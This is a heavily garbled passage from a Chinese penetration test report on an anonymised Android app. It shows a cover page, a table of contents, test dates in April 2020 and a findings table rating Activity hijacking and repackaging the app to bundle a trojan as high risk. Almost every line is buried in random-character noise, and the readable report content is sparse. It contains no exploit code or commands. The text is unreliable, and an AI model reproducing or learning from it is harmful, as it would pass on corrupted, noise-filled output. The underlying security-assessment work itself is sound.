& u2 f7 t# g& ?7 V9 a* w( ?- ^
: F/ \9 D% v6 D% t3 U9 t& L# b
1 i9 R, e, B& {
" N6 ?# B- N; u# ^4 d2 J' ~7 D. M
- A( n+ V6 H' @0 S$ d8 C" ]9 c
( X( ?& M+ t" q5 {9 j8 I
! u- v$ n& D5 ~
6 X, f; F2 l- _# I9 g4 t- q , ~' _8 y8 f$ Y' T
2 Y% V9 K' z6 A: p
- Q. P3 R' m, }
% ]$ L. {& {9 t( q- T 文档编号: $ A6 i( S1 n4 w4 H
2 [( C2 w6 I& X% l; K$ ]
6 \, W8 r2 K, B
O$ k4 j! i4 _ ) m. x8 q( f" S. c# X1 Y+ I
, ]9 X+ n) ^) q+ P! |' @4 G0 Z/ J ]$ j7 T$ m/ I! n% F0 o3 W
( N) M( ~& S; K7 T7 {8 I3 A
) Y2 A; r' r+ C& J- j) g% p* h: T& t& d @& |7 d
{) {& k- F& \! ~) g0 M
4 H/ o5 t8 X* W1 p 0 k8 k, h) g* S/ W( K) E7 Q! Q
# i9 h/ S: n# y/ y, W1 @0 P
' I5 K' g' ]8 {" ]" |/ a+ \
! x6 Z9 V/ ~- g- G
/ D7 K+ S' c' ]- o: J* t, a- N
3 \8 G* }5 J# P% H " E" b- s! ?- t1 ?" m
6 G0 C! g4 m$ \& f* m! j4 Q
% v! g* n- l9 h7 }& R8 m, \5 _9 r& m
% F% H. |5 o+ O; C( h
0 r# q( h/ C9 B, d* Q/ g t
2 _3 h- \ V0 U+ x7 p; m" W- Z0 j, R5 [" U J" L" @
) ]( i! E' q/ ]* l0 i% i8 M
) u2 G( i7 n* P6 e
) Q {; J2 K+ c0 \
7 O. y) l" g! e% u' G- ^
4 i1 _2 }1 ?; y, K+ q8 B! `" i+ @
) M& e; e" H' x0 n- p( r; n
. O2 m* J7 Z6 z7 [. F5 H( r; B8 k+ ~3 a( ?, K0 c
. W; A+ |1 y% B0 F/ ]& Y Q
1 m8 X) \0 b& m2 }! m 某某某APP渗透测试 ( e; @2 _! d) W
, s7 |9 \1 T" A3 Z9 O- u0 B! q
: L/ D1 c' @; I3 y8 H+ c
( R$ d% I+ k5 Y, K 3 D7 c7 ~; A2 E2 D+ [& Q
( O% `8 q# A1 f/ `- Q# I C
5 o( m3 U& `# p' j1 S5 K6 T
5 }* ?9 e5 H: q( U1 Z% k) a
* d- J( z: b1 j1 m' z$ r' d3 B6 O. m- Y
3 S( J5 p& h1 J+ ]+ T: x. X& E& P, A 4 Z$ _; g. X' ^0 H% _
0 ^. h1 ]+ X$ \, {' Y8 I
2 e7 x0 @2 D1 y$ {6 r$ o' \
6 y+ f* s1 p# c; S7 ]
P+ g" l2 Y2 i* T$ j4 Q) ? x R5 w. n2 ]0 ^: n, Y/ o8 A
0 F& A0 ~' _9 y% x# N
6 B" K% q0 ]; G1 B8 [" H) C+ Z8 d
/ _7 w! M d0 A4 u! X. @
4 g9 L0 \+ A4 Y: i" s$ r! f4 h
- m/ Q' P @2 x& B5 p+ O5 s5 ?: U4 ]2 m
) y. e6 Q3 B8 Q& |
( k" \8 a( W- C5 D8 Q# A4 a
. S9 {+ y D* T, h) x( Q1 @
% Z4 [/ W- t# C! L
4 {! c/ ^- j$ C# ~6 j
6 v- k3 Z+ p, j' o% e. P Q
' m6 R9 G8 I. M2 H# {2 `
/ \4 h. ~: C( j6 B1 F H2 M( r' J 技 术 报 告
/ a' D6 W6 p: U; o& P) \. \, g$ s8 z' |
, S$ a& q0 n0 C* J6 l# _
7 G. ~6 x6 ]1 m$ n& O7 x1 M [
& P( I3 _& M; F8 y, Q: B P1 l* ~' m- }: L/ G
8 A2 A5 F( m, M+ f
4 j5 C6 q9 J" l; ]" _
O5 ~" V) o: c0 K
2 c2 X7 I! n% ^ A. f' g# D
2 h+ Y. T. ]5 n% ~, _
: F+ i3 y8 T& I + i: a+ P; R6 ~4 T
# {6 W4 |% Q) L, x
) a- u& j2 q& C0 O; b* D) d2 u/ `% H0 }. K3 }; o2 i
3 p. H# c w" B! ]) ]8 M4 B
) k" O' P: u# {* r: k/ W
5 H9 o# l3 B* O+ d: q* r
* K, b5 ^2 M, P: c }8 a( ?+ E* u
3 [! N3 e$ B' ? G* z! A4 i- W* u" M( i; `/ ^
$ I7 Z. f T L* @5 p% n- t4 s6 T
7 ]6 P3 i$ g7 ~: I/ Y6 y) c1 K # ?" W# [+ L8 ?% H
+ B6 d" V# j9 q+ D" ~! r
6 d: Q0 O* R1 @9 A! j
* a9 N3 p, ?3 S& B. s1 V! Z7 b4 K ) z4 o g6 ?( x- h
, ^7 _, J8 s7 ]# C7 [ 4 P1 } i0 k7 D: ?! N
7 V7 `- P* n1 M t( q6 ~
8 Q/ V* F( f/ n
6 F$ Y* E% r9 j
& c( n& b0 B9 w! k+ R( e4 V+ ~3 B+ Y9 p. ~
) k* t k0 m+ ^. O6 K% z
- o0 L6 T5 |* |- u- s
" q+ _+ ?0 |& g* `
* I1 j: t, @2 l5 F9 ]
4 l- Q. ^ H9 c. N3 g/ d; f
+ b4 g6 |: n: i - L7 X+ m6 y. t) Y+ a
. S! ~$ W: q8 r# [% w' L& _
* P# @# Y3 s$ C/ o w$ O2 G2 w) {" P3 l* E" M
- {: S2 `7 _' @
- z+ h' F% u1 p, @; F
/ z! c7 A# h7 |9 y- o
* {) C# A; [2 ^! c6 K; B9 y
, ]5 v0 T3 z3 C9 K
# \ t. L2 p6 y5 y9 W: T
9 p( J# h6 c# [$ m! ^7 b/ }. [ {8 g, K$ l' g& |7 }4 `7 [" Z
$ ^! ?5 e- f$ C/ L/ T
+ s; A$ ^% J3 w* k
6 B/ h' P; G- ?% X# @5 D
% g* _2 ?6 p) H0 B+ U' { : I; O6 b; ~) \: n
U2 `/ i: \* f8 D( m8 X$ c 6 j; X: y: J: B
! n4 s) }! y) q
' c( w, P! o% _5 V$ J7 G% R/ H+ J
* c) Q$ P8 L! Y( G( B
1 |/ J9 M& f) f+ B
3 _! ^' v' N$ S: ~$ |* d2 D
# m! |" K8 E% Q
; W8 J4 A$ R+ b# \- V$ c: D2 d
6 P5 f) O+ j8 v/ m% j3 x1 ^! X* L# B' e# H
' r0 d& o# L: A+ @( y7 ]3 ?9 T5 M9 L; A# q G
; U1 }8 Z' v: w5 L8 C6 [' W4 e- R+ k. G) b/ O1 R) ~
. W! @: V- D2 h. d& W
/ _' H4 v* I. W! d7 z- {! K% F; s$ |$ P . o; W* m6 T' }& c
; f9 x* p0 `7 g% }; a! M2 O" V
: I: {6 p& h) m! c. k4 z
, L$ T8 p% ~6 ?3 e9 }0 ]
' \; f! k0 m5 f H: s8 ?4 {
+ J! k6 E0 Z( d; q. U& J; j, U
6 W! @, j7 t" v% F6 x! i2 b$ m: E- t# q) ^, R* a
0 d. N4 M' u. `! P3 J7 y+ I) G
8 E5 a( \3 l: C- E! T) E3 h
, G3 M) a! b9 y# N$ ~ [, A0 s5 r/ H8 R* M( y& @" L
* y9 J: U# b/ B- k) i/ w" ]' |& {5 z( Z: z6 T, [. O( V) a
6 `* d$ |0 X9 R4 O
4 o8 \& s" t+ z- i
1 l5 k8 C+ C2 M8 d
9 N( I' i( B1 e, P. H% p / O9 ^- n. A; y% l$ n6 z
5 r( y6 V' b% h0 E5 n( c* M
" b4 `, _3 k, }$ ^2 B" I' @ L r7 }# c0 G1 v& [% ?- n
1 H. `( \$ v# Z
, S+ t+ [& q) y+ p, ]
" V1 }1 J& d7 M Q4 r7 T
7 \; b& M! C, K# ]& v, N
2 i3 S% c6 X/ x( }* Y6 |, d
2 j: h$ J6 U/ K* R9 j
+ D$ Y9 a, M7 e5 J( o9 X+ J4 v/ j& L+ T3 R! t6 I
" Q* u. _/ x7 m- E, a( W, d
. m6 Z9 L4 Z& X3 |1 c 1 ~) h) A7 E$ d. h
+ l- _7 O8 r5 O* E8 x/ a
1 _2 @7 g8 r$ j$ G. b. B: R
% j0 O6 b- x2 N . ]- O! M/ R; E3 l
0 |5 G' T! Q4 `7 } 二〇二〇年 + `2 _2 \# `2 p8 Q' H `( E
/ s O* n. e, K, Y+ e' b- V
1 R& Z% B, o) e0 i. }
5 X" ]; v5 ?! s D, U/ Z
, e5 g( P% c) x% Y4 Z) _9 u+ B# d& v- Y9 m! l9 n( p! }2 d
v% l& i7 C# c6 F; W6 E! i* M1 i9 i1 {( b- f6 Z+ k" ~
& d4 I% |+ E: R4 F
, \7 U" R. Z) `5 X8 V5 X
( u* U9 j( [5 r- O- Y: B" v
% t6 O2 P7 @% e5 `+ A* {% M ^
; R% d" l6 v& N
: b; ^! a3 V% p5 B% V+ y1 `
9 u# W. X; J# F. s
( ]' b# y! b* q$ h5 D4 C+ T4 b 8 E" p5 ~# q; a% \
3 _- d0 k: C/ K& T& p
3 L! V9 m; f' H5 k
5 @! ^5 j2 c" K4 d% Z6 D
. c% v. I& n7 n4 Q" \- _' U
& H9 n6 d' x0 C& H& e, g1 q$ x; N 目 录 - z) k3 I2 }$ n, H d! _7 p
7 g* }9 [" P$ [) g
5 N# [6 V1 R% W* c* e. ~3 X1 V( {0 @
# i4 c( W. v3 D' P / I7 R# y; P9 Z( m: [9 i
# K" \8 I5 q0 B G; R # ]$ {: E% B. j4 v& ^
, Q: X# E' v7 D0 x4 B# ^( k
* e0 V Q Y# m5 t9 W! K6 V
& `0 \2 n% u6 G* a
) K# s) N7 _# M
) {( e6 o6 C6 ]" B & `8 r8 B! K8 Z! [
; n W# [% ]: Y% b 1 概述... 3
) V# K3 T: _6 Y/ C* U, a3 L; H+ |* ]
x. B2 Z+ z! o- H
. I6 ?+ \; V: j2 E5 a/ @$ S" s$ r! a ; j8 a1 _- N- l% y8 C6 i( C
. _8 i2 N3 K# G7 k, ~1 D) H
1.2测试时间... 3 T2 I9 p% A' A3 [" w3 |( x
% i/ w% U a$ x; a; L' O* [0 [
( s6 x& i1 k3 }
, R& e' j4 }5 w6 [
8 L4 g# l% B+ e S2 A
# k* z( Y3 c! v) m, g* \) c
1.3测试对象... 3
4 Z3 w+ ^* I8 l& S: Z& ^0 l8 M/ S* ?
: |& y- @+ W1 R/ y5 E: n; |
8 E* c$ L& p1 G- X) P8 w# d1 S
+ o7 p C' J9 e
+ y" L$ ]+ ~! z$ R8 A! j$ @
1.4测试结果... 3
. }8 Q E. ~6 L4 L+ z; }
9 W( w5 e! n t
# m: w0 X% y. P1 o
6 B$ {4 g" L9 v( @" L
: P0 Q, N$ W' Z) k: p+ m" q; R6 `$ j7 [+ t# d% z
2 检测结果... 4
9 h7 z% J; ~$ D' t' |* S7 Q6 X$ D4 B
- c) a% ^, H! h& I
. S4 `& I( Y( n) {+ h! b" X ) G: `* T+ P; J8 t% A9 p( F$ R
$ ~0 V1 h7 [1 @5 \" ~ 2.1 某某某... 4 8 E, f6 I! I n/ x! [ s. D6 _
2 N; R" k% l# I* {
! W6 p) z. [8 O. _
4 R& _6 T9 S. k, O5 @ + N/ G! ^8 k1 |. N- ]0 `, P2 t
! [1 T; l5 ^+ @2 b) z0 x
2.1.1检测目标... 4
7 A/ [9 U$ m% X0 ~6 h R, I9 s2 J
' ]8 \8 @3 p7 U
q( B0 r2 n; E' [" ]
1 w& U' _, {7 ~3 l& T; N* Z: c; B
+ Q0 a d! y9 K J! Y% X8 X/ s) w9 I0 z# X" @, T/ B
2.1.2检测结果... 4
- p+ L' X1 F. m: ^3 S) B" }" [ a7 V. ?
8 X9 P1 a9 _% a4 u
4 ?4 B( J) x% @: [- a& e
1 V! o, N+ c5 V s; @6 V ^# U
2.1.2.1. 4
& [; u; A7 }: H, t3 l
5 a# T+ ^9 f& H" a
9 F9 [% i) Z l3 F% B& f+ u
; U( B4 ^ Z% K& m) S
1 S0 A3 ?5 O" V
; t# Z% ~& _% d 2.1.2.2. 6
9 i% Y% m4 S! u& f: b4 K1 }
) l' B& C9 V3 o. q9 ~
5 p1 z' S* r3 ~% R" m. y2 h0 I
7 y$ D/ n1 U; F& i
, V4 U) s+ X$ F
6 V# v" [7 t& b0 E" Z8 P Z1 i4 F' q4 V7 I' k
/ @4 a% H: M h4 [
7 }: A: G: X- M$ u
& N. U5 }6 ^, M; a. O) G! ]
- J- J, [& f* ~# S2 x
3 N$ N$ K2 |" Q+ h3 g/ U5 ~
8 ~6 M0 b0 P" K! z$ j
, ~6 H* F. y! k1 s) f- T& P
7 y2 ~7 X4 U8 P0 F0 C# c$ S
$ O5 J' X' h. u4 q) _2 N$ d7 c
5 a" i$ Q$ q6 }/ ^9 x, \0 G; h: b% o+ `# Z
; ~2 ^0 B+ |( @" l {$ ?* J0 ^
1 概述 # Q) F- V2 o4 q, C8 j
5 p0 A: c4 W9 \. _9 n
6 j2 y) d# s r9 D/ n; H* Z
! C* L7 H% s% P( g4 r$ a" o
6 J$ v" Y$ Q. b2 q3 |7 x% _' {# [! ?7 R2 k8 P4 c: t. [* l
1.2测试时间 9 ^* {, ]1 x8 k1 W% X
- ?% N8 d6 n! v! g
0 s- Z) i, f( M) T
2 }: J, q) L8 B) O" J1 ?
2 |0 i5 C; g1 m4 ?# {
' i8 H% c$ W4 C* m/ L / }* M( {# H0 V
; c: i9 ~0 S7 `- C- }
+ I4 M; k$ j$ x$ v( Z+ c& `. C, o4 S* h
| 2 u! Y7 @- c4 E, r( q3 w8 D
) b5 |4 O R0 j E H0 \! J 6 z+ h0 y: X4 B `2 u" Y
4 ]7 {* e- O; J/ J; x 渗透测试时间
. ~$ [# ~* U; k, p
3 t4 v: x# K4 R3 _. m ) r# Y# x1 R8 @
2 t+ z* m: c& _/ j( j( ^
|
$ ?% M" Q: P- s* ]3 J
3 j% f& m( L/ V: e+ B
( x. F* Y$ [; r* ]" `# y( t
5 e+ }- ?- f8 t6 {; O* @$ t. c 2 C8 |' u. @* ]) d
/ J9 |2 _+ Z/ t1 T" L( B3 Z- @
|
. r5 v* @# X8 w4 Z( H. P4 m+ d7 G9 I& A
, |& D, h! {2 R2 U1 T2 j3 p) C% o- J* \9 d+ m: W6 R2 D* C" s
起始时间
3 f/ i; L6 }6 r e
2 d1 s6 b7 E/ M" n + r! w: ~: T: ]! F& T
' l% @& k, ^- u5 `
| 8 A% |1 R+ n/ _7 O3 R9 v
. K5 x' J' s* r2 u/ N- C6 S0 m% ^
$ g8 p' |. G( i6 ^
0 w8 r* E9 T& D3 N
" O* H. ]; D; x. \7 O; {
- B! V2 S8 R/ t0 U0 \ 2020年4月6日 / v% f8 G5 E' J' k! D
6 Q9 T$ J. P& }
! j6 F/ D4 ~* {6 r' m5 n) |1 a7 A6 |2 |
|
: l6 K+ x! @* S( ]9 F, `* ~* S8 H( l. y1 U; I* T( X
+ V1 O- }, j% o7 J! Z( h
( t: |0 h: ]9 ^
9 d' J1 W5 V, @# P/ [
2 y1 \/ x# A7 ^3 q: G+ V+ o |
0 [3 E% I% L' u& T
) Z7 o* p4 H4 e7 q' N* P& h9 O & W9 r$ @: r9 k6 G( W% X& N# d
0 R& o: D! l0 u8 c; q 结束时间 9 A# s. U3 V0 ]
4 @4 ~) Q y) L" |1 ?" v; { , o$ ? q; d- u m
& ~5 ^' z* W E" g3 O+ g! m* r q |
2 r" W$ C" A! N% t6 u- N6 l @0 d0 q3 R# r6 ]( S( [0 D
0 i' ?- m+ U( l$ z3 s% g
2 i. n- Y' n! R" P
7 s1 t& ]; G& F; i4 t+ `" b! s/ a( k( G: _1 R+ r
2020年4月9日
# V* V2 Z4 P6 G
, t l- x- L5 W/ e' P
: Q% j" y# Y5 f2 t/ {, K- L3 ^: q4 X L' Y8 ^9 \/ M! o5 p8 e
| * X |4 A0 U4 v2 i
; f* T, B. o) a" P
: L7 x c% D' q- ~( Y9 g
' a. _' N9 a7 j/ q
/ F0 A' P5 `; d& [
, M& w6 p: h; `4 \& c+ N2 x
. _, e& i# F# m$ E/ S- u0 a
! X1 h) t4 w% s- k5 b/ w; K ; }7 I% B% F: i d) Y, Q/ i
8 V! F1 P" v H3 F' q' A
1.3测试对象 - `/ t4 |6 P" `
: r& R. g2 D' N5 S: p* R: D! K; b) y
) t5 O# L( T% A+ v' r
/ g& D, g4 `+ d! Y( X/ r4 v
7 i1 z( [7 A3 V+ ?; U$ {, I
9 {% X4 \) ~/ k) t( s" J+ t6 E 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 1 e% J5 }" q L1 k% ?
- A8 P# W$ O$ B
. d, N# L v5 _
+ E# {8 {5 P+ e3 r- E* {! ^) k
; e Y% u: L1 V1 p) y
k9 d. I* m W2 Z/ v3 W! j3 J! A- o
表1-1 检测对象 5 C" _, }* z# m; F5 G# x+ E
! ]4 t$ M. B5 M$ w j1 V0 y% t
% r& d e7 g6 U+ @2 [# O% l. H3 _
$ l2 l8 H O( @) `
4 Q/ _/ E; X, ]" m' \+ K) k2 D- h. R0 U( B( e
9 N! k# O! \3 U9 ~8 G
* Y* F/ H' v9 k% c: o% w - v0 W; z# b1 ~
( Q5 }- r/ F! X5 E8 h9 M
| 6 C% e, m: b$ J- n8 P# ?
2 z+ _) g* g2 }: ~, j- a
7 ]% g- G( ?, D: @& d1 D/ Z9 p; H5 h! K- a+ o1 x1 a n
序号
7 Y/ E2 Z6 h7 ~% o
- f+ i! z$ H$ Z7 {% o0 m, D # }& q: d- o4 S% X% a E
! e0 ^5 |! R# V) t( J- H |
6 f% `' C% \. Y4 t9 u
3 D% G) u9 d1 ~% }8 Y* {
W7 l( J* @3 A
$ Q8 a) Q5 u2 r N7 n 5 A% Q5 r* x1 G5 I% k: _
% m! |& x: K% I; a* b
测试对象
! @& U$ T4 j6 _- n
: F9 B2 c2 ~% S8 R) P( @5 T" V! m
% V' k8 y' O* r S
* u8 N6 w* A; G' S |
. Y/ o; N% `5 l( w0 I2 j
0 u! ^1 i- ?$ ^ G$ I0 i+ F' e$ F
9 C" m- W$ l2 t1 N) v2 \6 y
! P7 V. J2 o- m0 s4 P# Z
5 ]' s+ F' J9 ^( w! e# z7 W! `& ]0 w0 F. _, h$ t! A
测试地址 0 k! C0 X$ Q8 A9 W
9 N1 }5 R0 Z+ @0 w- \ 4 X/ k8 W! t$ [9 W
! g6 ~- ]! n$ \" g# e7 O; @' o
|
8 z; e# @* Z, N: ^* A. H9 E( g* K9 j3 y; {$ G
4 m, @$ N: j, T* @8 ~
, z/ B/ y' D' k9 W- T% R- g
' c$ t' D0 U4 p. A/ ~9 w Z) _7 m+ E* }( B4 ^8 b8 J, w' [
安全漏洞 l/ {9 B$ Y$ \( T1 x
4 \. m9 N X( [% ^* D5 y- I " y2 \" t: S. p
; _% \9 \8 G% f5 C' |& \
| $ y; O( {; ?5 N- g. M8 ^* m
1 M! e( e7 U( X& Z; Y
& n9 Y6 l; P& `( J
% u) q! X8 X/ h! n * a/ | W; W. ^ G3 L7 U
' N J/ b8 B0 x+ x" w' D+ l0 \* U) W | * m( n, I8 f9 D6 w4 ]7 z
2 `# O+ ]; ]' G/ D
; S5 ~$ R2 I! W$ W8 K; n
" d Z% t5 b% B! n2 r2 Y' f6 |5 O 1
$ h3 f1 K9 \5 h. d' E8 _3 O' f2 ^* s/ Q: |
) R0 o. P8 f( X! }2 H; p6 m: {$ V4 H! i9 [6 q9 v& |7 g
|
5 Q% k% ^6 v6 U2 T4 o' |3 }* D& \! Q5 K
. @0 }% c) A% Q* R5 v0 f9 b6 N, K9 F( E1 @* u
+ L8 V2 |7 }! ]+ C A. q
" M: ^6 z9 j: L$ z2 [+ h 某某某安卓APP 7 G! l6 f. Y" I' c/ D9 ?
' |0 L: r( h3 o 0 ]5 P0 o5 M) d |0 J1 K- s
6 x1 m% ]& B) f* @ |
: u# G0 I6 [- F* _6 w1 d" {; ~( g1 ]; v2 ?, R6 U
* L' \ E: I+ @- T3 Y$ ]
* [, ~( y/ d- x4 W# R r' V+ t8 \( {2 ]; t9 J
\5 t. O( h+ _% Y9 |
, y' z3 O0 u+ s8 x U1 x2 ?' k {! }! C8 H+ F) J, ^
9 p0 k5 r0 [ b# o
, D3 ~- m6 D- K9 s" C
| / y6 N4 }4 I) V. J
# t$ k9 D! b) e
0 ?4 V+ P n$ r0 ^8 O
9 F( c5 ~" e1 ^ 0 }; J/ ~7 t8 N: |7 W6 l6 Q/ |
+ t+ @8 N* M# H) O. T% H 2 7 C% ^) D' v4 z& @% _$ N& y l
1 w8 ]5 A2 H R1 e5 k N6 ?0 d
9 D% f1 I- B$ `" s7 D9 P6 n5 [& {" i+ n! Z( q7 x4 m( |1 w
| * E3 M6 M4 m2 z: ?8 g; E5 m w7 N+ S
8 Q* T' P2 w8 @, R
f$ r+ k$ D+ J1 G+ C
* U# u. {3 q- f# [) `
, ?. j- l Q: H3 _/ M0 b5 Z* w6 _6 ^8 w* p) T4 @: C8 D/ M
H" C" }2 Z4 y' I- c
! ~# a- h) U$ R - g+ R" J9 l: {3 K
' j+ ?) J; o1 s% E) J7 }% Y2 r 1.4测试结果 " c* z: {% o9 [( r7 ^
! ]! @, F- v4 V$ _5 [$ r* I
, D4 ?" D% H. ?
- ~9 p8 K# h: M( l0 S
$ m$ h7 C$ c& I& H1 d% l0 ^' M9 {* B3 g! Z' U1 {
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示:
7 d }7 P" \2 U7 \* ^7 v7 I/ p! y3 U) I
7 w1 l4 Z" A2 K( ~, m" I: X& y( S
0 f$ D& F; F+ f) r
6 j3 A9 I! L, k2 F* S% P
9 b4 m8 @9 {0 {+ z1 I! r' k; k: n C4 s# D6 z: ^
7 Z9 y. j- b* R5 W( U+ `
) K! c2 L# k1 k ?
9 U# m+ ?1 W6 V# i F8 Z6 @
; E% w+ C3 ^# d* F2 X p( G( R
q1 P+ z% b' R
% N) A! q0 e. y% r6 H! Y
" g( f- z/ @' \' ~" ^* h- B6 R, L! b" J* B1 c6 A8 }2 H' t
% n& B8 {5 C4 V' X# J- I$ B" i* t1 Q& H A' A! `: Z; I- o, V
|
1 X% [5 d8 j1 o0 U+ c, o+ e/ a* }$ B1 n' I5 V- D6 Y
+ _" {- j% }, Q
) Q% e# n: J( }5 G' v6 l7 y5 ~% j 序号
( G3 ~& P) z' Z3 q8 {2 P3 q0 z
7 \ q+ y* ~1 d$ Q2 j- N , K. f% l6 D4 F" y+ u5 ]
, V. n$ d- Q6 H3 c# |3 E
| 1 y& N( r" g8 _8 s2 W
1 u4 _9 _+ y2 Q5 X6 J4 N8 l
" q$ S; w4 j3 _% t# d, t
j7 k! C/ c( d9 F& G
' X; `5 i. i5 @' {2 y d$ d4 ]2 q4 [4 B5 w, T
系统名称
1 K: |( A* Q" P% l# G9 t7 ?
7 h$ ]$ q1 V0 Y/ S, A 7 A1 I: u- C1 M' l+ f. W
9 H3 W% [& J4 H; ~) m, k* G | * }( d# T4 `1 J1 f
' |! a/ D0 Y7 b7 |' W
. `! h8 k0 V8 J
T# i+ |" E" G' Q$ F* a
( t4 Y, B! d* @% a1 z4 W% Z6 b Q+ T! E3 B% v
漏洞名称 # E" [; w& z& o
, g% {8 S1 ]0 f- |% ` 3 ?8 L$ n0 h! b, J
' _- m0 {0 H) O2 Q5 r& P6 m |
/ Z; ~+ d+ m% A6 O
+ t: A# U2 b: m
5 k. l; T& H; {$ ?1 m7 h1 E& l3 h& Q, M) k9 h4 Q- \
6 }3 N9 ]9 r9 T% I" l3 t' V3 h; P# u
, {1 G1 k! f2 t _: W. J- J 漏洞危害
- b" f; S! P# L \) }3 m W
* h3 Z4 d1 Z$ t; N3 x6 f ! Y/ Q2 s6 K, W! a& b# s4 J+ v
. l4 F/ P) c6 h' P% L1 c: T
|
# U% G2 @8 g4 b* }
* d5 A9 {) S) e9 ?% G , [; X' {7 L4 i
H( k. S. H& D( { 7 Q' \$ H) V0 a; M4 w
0 p! R8 l* y+ m5 y* A& T+ J
修复结果
2 V5 @9 o! i( \5 b: D9 `) |
2 D8 {& ^+ O/ a- H9 b1 u , H. i8 r8 K1 j% r( K( S* s
3 T$ t. h$ A; W! `
| & s- i; n/ Q7 X( F z2 H
% w8 J0 _. v+ }. W2 d; G( R
7 ]/ T2 h3 y8 ~; L$ N$ n% {
u0 y: {2 E$ g, j / U/ }+ [. @3 j" W2 p
6 |9 X) w; ?7 W$ G. }1 U | % a$ E4 G2 ~. Y" w6 e0 G" Q
4 X/ b- L8 g: \
' H) C2 Q, C% A3 @* Y, V+ q! b* _
: x2 Y& V$ A( n, I" T
1
" q. e8 A# I* Q1 c: x' J& Q2 q$ I/ D h
) [& ?6 i1 b7 K# e5 l" v* `; \( p
2 Z7 Y1 z* R9 B% f6 J% s$ j1 m
|
- v+ Y4 g% r: ]- b2 z+ x
1 j* D: S4 n, b( `
% P9 J4 g; K# g. P, E& j9 J3 Y" @# `8 w
0 f: ^- d$ V, O: O! V; E4 {& T4 V
1 B8 w( Z; ^( d& H7 Z ]
某某某某某某APP
1 I- T4 v. u) r& @5 n
+ q4 w$ @& U7 L6 e& E4 W
i5 B# S( ^% r3 J, K
' G- w6 X4 T5 g( a4 | | - o9 O9 h+ O0 I* H6 y0 J
6 T3 H) R1 ]4 ` 9 M8 e' {. @" q, c
& C. H$ C- H; m0 Y z
3 X7 s6 W& V- n( {0 v9 J0 S! w+ c1 E8 J; E( q
Activity 劫持
: D3 ?1 x0 R5 h! t r* g7 m; c9 A5 z' |( ~7 x/ w3 O2 ~. z! U
( y) X! M3 b( K+ V8 _8 z, [: z- c* V( |+ G- ], t8 K
2 k: k8 A9 F+ e
5 Q7 }% v' `# J
1 B- l. l5 E* P0 h1 B0 x7 M) z/ y n& L9 b
7 K& @# N6 u/ z
3 ~' v- i9 H; W1 `- L: X% C | ( t$ X5 a# e. e+ v% c
2 I2 v) r* { J0 |" T2 @0 P0 h
, v% m3 w& j& c
; Y, c x3 t M7 V N; ?
4 P" o* T: o$ B# e, }% O
" p9 F7 y6 i) a+ ?: o/ Y
高 $ ^ w5 j4 }; ]# `1 K: g
$ k' p& h) }6 | `" q
7 K! N- M5 `" l
; [ b9 J; m! l6 f7 P | * N( h3 n! C8 Z9 k$ v2 m
+ J4 b$ s% a, j- f8 g 8 H7 W+ a) M( o. a8 k
) f9 `8 n9 f3 {1 z 2 d! `$ ~8 c3 m$ c
. v1 S7 a8 f: X4 L/ K/ ~/ c 1 m, w: ~1 |+ M+ q. O, M
! J0 E2 O2 o4 n
) p5 R- C; `0 h! m+ ]+ V1 z2 U( z C
|
% Q, X/ k) G* r( O3 H1 N k/ m7 s; R: O9 L S& O6 p
- X$ C8 q% ~0 I/ A- Z; } D, d+ Z Q: e" y( A, m+ @1 U
& U3 @* r4 i# Q4 L6 w0 z7 Z4 C& {
: a7 d2 a. c" J |
3 r* Z+ f8 A/ d0 R1 z, Z# _/ Y! u+ s* p2 v! Q
5 k; s/ Z4 I7 y; G% x! H
' B' Q- X. i# c! H2 x 2 1 t& q) M' V! d$ K" V7 ~. k4 T
) M* k8 h3 A/ h9 a! p1 P& ^ 5 F7 Q0 ?! Q& C' ^4 E% M( d
+ @1 Y* |! M0 N: @6 q* c% A
| 3 ]- l& R) u3 c+ m t
$ H# F4 z& {+ u3 ^ 0 L' C+ O2 O* n2 c. n; d7 g4 ~
; e1 s& [5 n1 B \
! R5 N J5 A9 q6 `! J
: q5 D' R; l, H 某某某某某某APP 4 }; d0 @$ j- v8 f: i0 d, ^
% r j$ Z% [3 w5 r6 R
, G/ q; v9 z* r2 H/ ~9 b% Y" ]. M+ |1 i) a! \
|
: ], n8 l: I1 M" S+ F) @ {9 D9 U8 n$ [# ]% f; ?0 B9 ~6 ^
/ ?/ z B- `" ?0 R3 C% M+ W3 R% D D
k% N) D0 g) H" H6 X* Y! d: j7 ]7 r
! ^7 a, R* H) G1 [- V; e0 ~( A: n; u' ^ E V
反编译二次打包捆绑木马、篡改APP代码
! j! a% G* o1 V, {% P$ [2 e, K* f4 H! h- r6 \8 j+ l" p+ W& k
) o/ @# \" }) D4 n
# Z1 B; O& z: g4 O5 T6 S" L+ Z |
a9 u) r1 Z8 r# S9 `9 q& M3 r/ ?& n0 L8 j
3 k0 D# ?4 d+ s
3 `9 |6 d" M2 h2 U3 b; r$ C. W
2 U( C' K0 Q4 E* f8 j
; c# T/ k3 D$ a. j 高
0 @ R# h1 F6 r# s; C% b7 ~* v8 C
$ v2 M7 o$ z B& d' F
O% a) Y; r, f: O4 S# g+ n4 W5 E" J6 ^, V; [ k
|
! _. w' S1 ?+ J) E
# _/ l. t: O# A
5 `4 t- c& r9 \8 k3 x h& i& `
2 {' s6 P' R) ]6 s$ [) P
' C1 {6 c# x! q ]3 O- }' I( E2 @/ r
& G) o: ~; g2 S
6 R3 k. G7 q% ^/ o% z, u8 ^1 k
% @6 e4 _" m; o; V1 g
2 J6 K D. Y5 e2 o+ J4 ?0 } I
| & }9 x+ W/ j9 e! a7 H7 o, N
2 f: n g" E9 J" A" j
/ ~; N: P! q( {- \
* g* Y& a6 e4 e$ Z; t6 j' s. ~* S" E
; i: b; x: l! j D7 {5 ^! t
) o1 {, H' F* ]" D
6 v5 L& G# k" y# j# }6 _3 H) e5 ~' ]' ~+ @0 R9 d6 `' Q0 G
% H6 m( t. Y, r
% \0 x% o1 h. z" b" C
}- M* i4 E4 E( u- e
) S4 u- j" T4 ]# [. P$ \; S ' D5 L2 w7 [) C, V `. O1 G3 ~
& ]& M2 q: _! d4 k+ |* ^
, s' k" |' }$ \" t
0 D0 m9 w0 R4 L: ~
" \# F" h7 N# H( ^! s
9 @, v3 F4 A" ?" l 表1-2 测试结果
& v' [: l; ~2 v6 M2 c# r' H9 W
- q( M5 Z: P* b5 Z+ R5 _+ K0 y/ m
3 e4 j6 u' n: ~. {; S- [
3 s- ^! M$ M; W- `
5 f- p1 X( Y, R( m% k2 d0 o
